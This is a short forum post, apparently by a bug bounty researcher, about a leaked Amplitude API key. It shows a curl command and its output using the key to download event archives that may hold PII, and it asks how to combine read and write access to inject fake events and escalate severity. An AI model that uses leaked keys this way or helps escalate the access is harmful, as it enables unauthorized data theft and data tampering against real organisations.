Clarification on Amplitude API key read vs write permissions

[SaFiSec]

Hi Team,

I found an exposed Amplitude API key and confirmed it works against /api/2/export with a 200 OK response. I can retrieve event archives in zipped JSON format, and recent time ranges may expose PII or sensitive business metrics. If /httpapi also works, it’s possible to inject fake events.

Request curl -u KEY>:<KEY https://amplitude.com/api/2/export?start=20200201T5&end=20210203T20 >> Malious.zip

Response: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 69 100 69 0 0 23 0 0:00:03 0:00:02 0:00:01 23

How can an exposed Amplitude API key be chained with both read and write access to escalate the impact to critical severity?